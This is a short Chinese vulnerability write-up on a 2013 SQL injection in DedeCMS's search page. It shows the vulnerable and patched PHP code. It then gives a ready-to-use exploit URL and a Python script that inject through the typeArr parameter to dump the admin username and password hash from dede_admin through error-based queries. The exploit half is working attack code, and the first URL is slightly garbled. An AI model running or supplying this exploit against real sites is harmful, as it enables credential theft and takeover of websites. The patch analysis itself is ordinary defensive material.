dedecms search注入简单分析

dedecms 2013-01-15 search**注入漏洞**

漏洞发现者:鬼哥

20130115**常规安全更新**

include/arc.searchview.class.php, 搜索功能准确度优化
member/myfriend_group.php, 修复会员中心会员分组功能存在的安全隐患
plus/search.php, 修复搜索功能存在的安全隐患

 

存在漏洞的文件

/plus/search

//引入栏目缓存并看关键字是否有相关栏目内容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ' ', $keyword);

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id;  //对ID没做任何过滤 导致注入

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

 

更新后的补丁:

//引入栏目缓存并看关键字是否有相关栏目内容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

//$keywordn = str_replace($typename, ' ', $keyword);

$keywordn = $keyword;

if($keyword != $keywordn)

{

$keyword = HtmlReplace($keywordn);//防XSS

$typeid = intval($id); //强制转换为数字型

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

 

利用EXP:
http://site/plus/search.php?keyword=11&typeArr[`@'`and(SELECT 1 FROM(select count(),concat(floor(rand(0)2),(SELECT//concat(0x5f,userid,0x5f,pwd,0x5f) from %23@__admin Limit 0,1))a from information_schema.tables group by a)b)]=1

Python EXP:

#!/usr/bin/env python

#coding=utf-8

#By 花开、若相惜 Pax.Mac Team

import urllib2, re

req=urllib2.Request("http://localhost/DedeCMS-V5.7-GBK-SP1/uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1")

res = urllib2.urlopen(req)

html = res.read()

print html

html = re.findall(r"Duplicate entry \'\w+'", html)

if html:

print "success"

print html[0]

else:

print "no sql injection"

res.close()

 

dede_search注入
更新漏洞库
update-tool